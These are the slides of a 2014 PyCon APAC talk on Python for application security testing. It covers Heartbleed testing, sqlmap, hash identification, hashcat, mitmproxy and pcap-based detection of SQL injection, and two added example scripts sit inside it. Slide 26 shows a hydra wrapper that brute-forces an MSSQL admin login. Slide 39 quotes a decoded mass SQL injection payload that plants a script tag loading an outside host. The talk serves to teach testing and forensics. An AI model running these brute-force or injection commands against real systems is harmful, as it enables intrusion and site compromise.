Python for Application Security Testing

za
May 18, 2014

My slides at PyCon APAC 2014
https://tw.pycon.org/2014apac/en/program/38

Transcript

  1. Python for Application Security Testing
    Zaki Akhmad
    PyCon APAC 2014
    May 18, 2014
    Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 1 / 41

  2. hen gao xing ren shi ni (Chinese: nice to meet you)

  3. About Me

  4. Zaki Akhmad
    @zakiakhmad

  5. Python Indonesia Meetup Organizer
    Planet Python Indonesia Maintainer

  6. Security Analyst

  7. This talk won’t be a rocket-science talk

  8. Heartbleed

  9. (image-only slide)

  10. (image-only slide)

  11. Python script to test heartbleed vulnerability
    https://github.com/musalbas/heartbleed-masstest

  12. Detect and Exploit SQL Injection

  13. Exploits of a Mom, XKCD #327

  14. #1. Injection

  15. SQL Injection is (mostly) about
    the unauthorized DBMS data access
    Miroslav Stampar, sqlmap Developer

  16. SQL Injection techniques:
    Blind
    Error
    Union (partial and full)
    Time
    Stacked

  17. sqlmap - Project Statistic
    http://www.ohloh.net/p/sqlmap

  18. Dump DBMS database table entries

  19. Contribution
    Feature request
    Configure output directory
    Retrieve database server IP address
    Add Indonesian common-columns
    Bug
    [CRITICAL] unhandled exception

  20. Identify Hash Algorithm

  21. If you find hashed passwords made only of a-f,0-9 with length 32, they might be MD5

  22. hash-identifier: Python script to identify the hash algorithm

  23. We need to know the hash algorithm to crack it
    Security is only as strong as the weakest link
    And the most frequent weakest link is password

  24. $ hashcat-0.47 ./hashcat-cli64.bin --help
    hashcat, advanced password recovery
    Usage: hashcat [options] hashfile [mask|wordfiles|directories]
    ...
    Hash type
    0 = MD5
    10 = md5($pass.$salt)
    50 = HMAC-MD5 (key = $pass)
    100 = SHA1
    200 = MySQL
    400 = phpass, MD5(Wordpress), MD5(phpBB3)
    500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
    800 = SHA-1(Django)
    hashcat: advanced password recovery
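
    The shape-based identification from slides 21-24, as an added example (not the hash-identifier tool or any code from the talk): classify a stored hash by its character set, length or self-describing prefix and map it to the hashcat hash-type numbers quoted above; a bare hex digest only suggests an algorithm, so a second function resolves the ambiguity with a password you already know (for instance a test account). The SHA-256 entry and the sample hashes are my additions, not from the slides.

```python
import hashlib
import re

# Added example: classify a stored password hash by its shape and map it to
# the hashcat "Hash type" numbers quoted on the slide.
HEX_RE = re.compile(r"[0-9a-fA-F]+")

# bare hex digests keyed by length; the shape only *suggests* the algorithm
# (32 hex chars is MD5 in the common case, but NTLM and MD4 look the same)
HEX_DIGESTS = {
    32: ("MD5", 0),
    40: ("SHA1", 100),
    64: ("SHA-256", 1400),   # not on the slide; hashcat mode 1400
}

# self-describing formats carry a prefix that pins the algorithm down
PREFIXED = [
    ("$1$", "md5crypt, MD5(Unix)", 500),
    ("$P$", "phpass, MD5(Wordpress)", 400),
    ("$H$", "phpass, MD5(phpBB3)", 400),
    ("sha1$", "SHA-1(Django)", 800),
]


def identify_hash(h):
    """Return a list of (label, hashcat_mode) candidates; empty if unknown."""
    h = h.strip()
    for prefix, label, mode in PREFIXED:
        if h.startswith(prefix):
            return [(label, mode)]
    if HEX_RE.fullmatch(h) and len(h) in HEX_DIGESTS:
        return [HEX_DIGESTS[len(h)]]
    # "hex:salt" is the md5($pass.$salt) layout (hashcat mode 10)
    digest, sep, salt = h.partition(":")
    if sep and salt and len(digest) == 32 and HEX_RE.fullmatch(digest):
        return [("md5($pass.$salt)", 10)]
    return []


def confirm_algorithm(h, known_plaintext):
    """Resolve a bare-hex ambiguity with a password you already know (e.g. a
    test account): return the hashlib name that reproduces the digest, or None."""
    data = known_plaintext.encode()
    for name in ("md5", "sha1", "sha256"):
        if hashlib.new(name, data).hexdigest() == h.strip().lower():
            return name
    return None
```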

  25. hydra: A very fast network logon cracker
    dictionary attack: trying to log in using the words in a dictionary
    Python script to run hydra over multiple dictionary files (wordlists)

  26. hydra-multiple-wordlist.py
    import os
    from subprocess import call

    def listdir_fullpath(d):
        # full paths of every file in directory d
        return [os.path.join(d, f) for f in os.listdir(d)]

    def main():
        wordlists = listdir_fullpath("/home/za/tools/wordlist")
        for wordlist in wordlists:
            print("in progress using %s wordlist" % wordlist)
            # one hydra run per wordlist, with the options shown on the slide
            call(["hydra", "-l", "admin", "-P", wordlist,
                  "192.168.99.66", "mssql", "-v", "-t", "128"])
        print("done")

    if __name__ == "__main__":
        main()

  27. Proxy - Network Traffic

  28. web browser - proxy - server
    mobile apps - proxy - server

  29. mitmproxy
    mitmproxy: a man-in-the-middle proxy
    intercept, modify, replay and save HTTP/S traffic

  30. mitmproxy
    analyzing HTTPS connection

  31. mitmproxy
    analyzing POST request

  32. Network Forensic

  33. Client: We have deployed a (network) firewall,
    but we still got attacked by SQL injection
    Start the forensics by capturing all network traffic

  34. sqlinject-finder
    Script that parses a pcap and looks for common SQL injection characteristics

  35. sqlinject-finder
    # tcpdump -i eth0 port 80 -s0
    -G 3600 -w packet_%Y%m%d.%H%M.pcap

  36. sqlinject-finder
    $ python sqlinject-finder.py -f packet_20140518.1530.pcap
    Source : xxx.80.8.88
    Page : /transfertoasp.aspx
    Value : id=143) declar @s varchar(4000) i
    set @s=cast(0x20736557420616e7369....
    Frame : 52653
    Reason : Possible use of SQL syntax in variable

  37. sqlinject-finder
    We need to decode it

  38. sqlinject-finder
    #!/usr/bin/python
    import binascii
    import sys

    # hex string from the cast(0x...) blob in the captured value, given on the command line
    print(binascii.unhexlify(sys.argv[1]))

  39. sqlinject-finder
    Decoded packet
    set ansi_warnings off DECLARE @T
    VARCHAR(255), @C VARCHAR(255)
    DECLARE Table_Cursor CURSOR FOR
    select c.TABLE_NAME,c.COLUMN_NAME from
    INFORMATION_SCHEMA.columns c,
    INFORMATION_SCHEMA.tables t where
    c.DATA_TYPE in (\’nvarchar\’,
    \’varchar\’, \’ntext\’, \’text\’,and
    c.CHARACTER_MAXIMUM_LENGHT>30 and
    t.table_name=c.table_name and
    t.table_type=\’BASE TABLE\’
    OPEN Table_Cursor FETCH NEXT FROM
    Table_Cursor INTO @T,
    @C WHILE(@@FETCH_STATUS=0)
    BEGIN EXEC(\’UPDATE
    [\’+@T+\’] SET [\’+@C+\’]=\’\’">
    src="http://enswdzq112aazz.com/s1.php">
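
    The decoding step from slides 36-39, as an added example (my code, not sqlinject-finder): take the parameter values a pcap parser or web log hands over, URL-decode them, pull the hex blob out of any cast(0x...) expression, unhexlify it and report which SQL keywords appear in the decoded text. The sample values are constructed to mirror the shape of the captured request on slide 36, not the real payload; the keyword list and the odd-length truncation handling are assumptions.

```python
import binascii
import re
from urllib.parse import unquote_plus

# Added example: find and decode hex-encoded SQL hidden in request parameters.
HEX_BLOB_RE = re.compile(r"cast\s*\(\s*0x([0-9a-fA-F]+)", re.IGNORECASE)
# keywords that mark the payload as SQL rather than ordinary form data (assumed list)
SQL_KEYWORDS = ("declare", "exec", "cursor", "update", "information_schema", "select")


def decode_hex_blobs(value):
    """Return the decoded payload of every cast(0x...) blob found in value."""
    decoded = []
    for hexstr in HEX_BLOB_RE.findall(value):
        if len(hexstr) % 2:          # odd length: capture was truncated, keep the whole bytes
            hexstr = hexstr[:-1]
        decoded.append(binascii.unhexlify(hexstr).decode("latin-1"))
    return decoded


def inspect_value(raw_value):
    """Return (reason, keywords_found, decoded_blobs) for a suspicious value, else None."""
    value = unquote_plus(raw_value)
    blobs = decode_hex_blobs(value)
    text = " ".join([value] + blobs).lower()
    hits = [kw for kw in SQL_KEYWORDS if kw in text]
    if not hits:
        return None
    reason = "hex-encoded SQL in cast(0x...)" if blobs else "SQL syntax in variable"
    return reason, hits, blobs


# Constructed sample values shaped like the captured request on slide 36.
ENCODED_SQL = binascii.hexlify(b"set ansi_warnings off DECLARE @T VARCHAR(255)").decode()
SAMPLE_VALUES = [
    "id=143",
    "id=143) declare @s varchar(4000) set @s=cast(0x%s as varchar(4000)) exec(@s)--" % ENCODED_SQL,
]


def scan(values):
    """Run inspect_value over a list of parameter values; return the findings."""
    return [(v, inspect_value(v)) for v in values if inspect_value(v) is not None]


if __name__ == "__main__":
    for value, (reason, hits, blobs) in scan(SAMPLE_VALUES):
        print("Value  :", value[:60])
        print("Reason :", reason, hits)
        for blob in blobs:
            print("Decoded:", blob)
```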

  40. Wrap Up
    Heartbleed
    SQL injection
    Hash algorithm
    Proxy
    Network forensic
    ... and many more!

  41. (image-only slide)